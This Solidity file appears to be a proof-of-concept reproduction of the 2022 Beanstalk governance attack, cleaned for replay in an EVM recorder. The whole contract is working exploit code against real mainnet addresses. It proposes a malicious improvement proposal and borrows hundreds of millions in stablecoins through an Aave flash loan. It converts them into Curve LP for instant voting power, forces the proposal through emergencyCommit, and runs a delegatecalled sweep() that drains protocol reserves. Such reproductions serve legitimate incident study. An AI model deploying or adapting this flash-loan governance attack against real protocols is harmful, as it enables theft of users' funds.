// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
// Cleaned for plain EVM recorder (removed forge Test / CheatCodes)
pragma solidity >=0.7.0 <0.9.0;

import "./../interface.sol";

contract Exploit {
    event log_named_uint(string key, uint val);
    // CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); // removed for plain EVM recorder
    ILendingPool aavelendingPool = ILendingPool(0x7d2768dE32b0b80b7a3454c06BdAc94A69DDc7A9);
    IERC20 dai = IERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);
    IERC20 usdc = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
    IERC20 usdt = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
    IERC20 bean = IERC20(0xDC59ac4FeFa32293A95889Dc396682858d52e5Db);
    IERC20 crvbean = IERC20(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
    IERC20 threeCrv = IERC20(0x6c3F90f043a72FA612cbac8115EE7e52BDe6E490);
    IUniswapV2Router uniswapv2 = IUniswapV2Router(payable(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D));
    ICurvePool threeCrvPool = ICurvePool(0xbEbc44782C7dB0a1A60Cb6fe97d0b483032FF1C7);
    ICurvePool bean3Crv_f = ICurvePool(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
    IBeanStalk siloV2Facet = IBeanStalk(0xC1E088fC1323b20BCBee9bd1B9fC9546db5624C5);
    IBeanStalk beanstalkgov = IBeanStalk(0xC1E088fC1323b20BCBee9bd1B9fC9546db5624C5);
    address maliciousProposal = 0xE5eCF73603D98A0128F05ed30506ac7A663dBb69;
    uint32 bip = 18;

    constructor() {
        // no fork in browser recorder - state is preloaded from the bundle
    }

    function exploit() public payable {
        // Full attack flow for the EVM Playground recorder (matches PoC + MD walkthrough):
        // 1. ETH->Bean swap
        // 2. small depositBeans (initial Stalk)
        // 3. propose malicious BIP (empty cut, _init=this, calldata=sweep)
        // 4. (replay ts already +24h via setup.blockTimestamp so time gate satisfied)
        // 5. approvals
        // 6. Aave flashLoan -> executeOperation
        //    inside: Curve LP, silo deposit for mass Stalk, emergencyCommit
        // 7. the BIP's delegatecall runs sweep() in Diamond context -> drain
        // 8. unwind + logs (demo)
        address[] memory path = new address[](2);
        path[0] = uniswapv2.WETH();
        path[1] = address(bean);
        if (msg.value > 0) {
            uniswapv2.swapExactETHForTokens{value: msg.value}(0, path, address(this), block.timestamp + 120);
        }
        emit log_named_uint("After initial ETH->BEAN swap, Bean balance of attacker", bean.balanceOf(address(this)) / 1e6);

        // small deposit for seed Stalk (enough to propose)
        bean.approve(address(siloV2Facet), type(uint256).max);
        uint256 beanBal = bean.balanceOf(address(this));
        uint256 toKeepForMeta = 10_000e6;
        uint256 beanForSilo = beanBal > toKeepForMeta ? beanBal - toKeepForMeta : 0;
        if (beanForSilo > 0) {
            siloV2Facet.depositBeans(beanForSilo);
        }
        emit log_named_uint("After BEAN deposit to SiloV2Facet, Bean balance of attacker", bean.balanceOf(address(this)) / 1e6);

        // propose the malicious BIP
        IBeanStalk.FacetCut[] memory _diamondCut = new IBeanStalk.FacetCut[](0);
        bytes memory data = abi.encodeWithSignature("sweep()");
        beanstalkgov.propose(_diamondCut, address(this), data, 3);
        emit log_named_uint("BIP proposed", bip);

        // approvals (flash, curve, silo)
        dai.approve(address(aavelendingPool), type(uint256).max);
        usdc.approve(address(aavelendingPool), type(uint256).max);
        usdt.approve(address(aavelendingPool), type(uint256).max);
        bean.approve(address(aavelendingPool), type(uint256).max);
        dai.approve(address(threeCrvPool), type(uint256).max);
        usdc.approve(address(threeCrvPool), type(uint256).max);
        usdt.approve(address(threeCrvPool), type(uint256).max);
        bean.approve(address(siloV2Facet), type(uint256).max);
        threeCrv.approve(address(bean3Crv_f), type(uint256).max);
        bean.approve(address(bean3Crv_f), type(uint256).max);
        IERC20(address(bean3Crv_f)).approve(address(siloV2Facet), type(uint256).max);

        // Aave flash (reduced USDT to avoid isolated-state edge cases seen in harness)
        address[] memory assets = new address[](3);
        assets[0] = address(dai);
        assets[1] = address(usdc);
        assets[2] = address(usdt);
        uint256[] memory amounts = new uint256[](3);
        amounts[0] = 350_000_000 * 10 ** 18;
        amounts[1] = 500_000_000 * 10 ** 6;
        amounts[2] = 1_000_000 * 10 ** 6;
        uint256[] memory modes = new uint256[](3); // 0 = no debt
        aavelendingPool.flashLoan(address(this), assets, amounts, modes, address(this), new bytes(0), 0);

        emit log_named_uint("After flash/curve/deposit/emergency/sweep, attacker USDC", usdc.balanceOf(address(this)));
    }

    function executeOperation(
        address[] calldata assets,
        uint256[] calldata amounts,
        uint256[] calldata premiums,
        address initiator,
        bytes calldata params
    ) external returns (bool) {
        // 3Crv pool: bundle flash stables
        uint256[3] memory tempAmounts;
        tempAmounts[0] = amounts[0];
        tempAmounts[1] = amounts[1];
        tempAmounts[2] = amounts[2];
        threeCrvPool.add_liquidity(tempAmounts, 0);

        // bean3Crv metapool: obtain the LP token the Silo accepts
        uint256[2] memory tempAmounts2;
        tempAmounts2[0] = bean.balanceOf(address(this));
        tempAmounts2[1] = threeCrv.balanceOf(address(this));
        if (tempAmounts2[0] == 0) tempAmounts2[0] = 1e6;
        bean3Crv_f.add_liquidity(tempAmounts2, 0);

        emit log_named_uint("bean3Crv LP minted", IERC20(address(bean3Crv_f)).balanceOf(address(this)));

        // Deposit LP -> instant mass Stalk (root cause of being able to pass BIP)
        siloV2Facet.deposit(address(bean3Crv_f), IERC20(address(bean3Crv_f)).balanceOf(address(this)));
        emit log_named_uint("after silo LP deposit (Stalk granted)", 1);

        // emergencyCommit executes the malicious BIP -> _init.delegatecall in Diamond ctx
        beanstalkgov.emergencyCommit(bip);
        emit log_named_uint("after emergencyCommit", 1);

        // unwind LP for repayment simulation
        bean3Crv_f.remove_liquidity_one_coin(IERC20(address(bean3Crv_f)).balanceOf(address(this)), 1, 0);

        tempAmounts[0] = amounts[0] + premiums[0];
        tempAmounts[1] = amounts[1] + premiums[1];
        tempAmounts[2] = amounts[2] + premiums[2];
        threeCrvPool.remove_liquidity_imbalance(tempAmounts, type(uint256).max);
        threeCrvPool.remove_liquidity_one_coin(threeCrv.balanceOf(address(this)), 1, 0);

        return true;
    }

    function sweep() external {
        // When delegatecalled by the Diamond (via malicious BIP _init), address(this) == Diamond.
        // Drain the non-Bean reserves the protocol holds at this moment.
        // This is the core of the real 2022-04 exploit.
        IERC20 erc20bean3Crv_f = IERC20(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
        erc20bean3Crv_f.transfer(msg.sender, erc20bean3Crv_f.balanceOf(address(this)));
    }
}
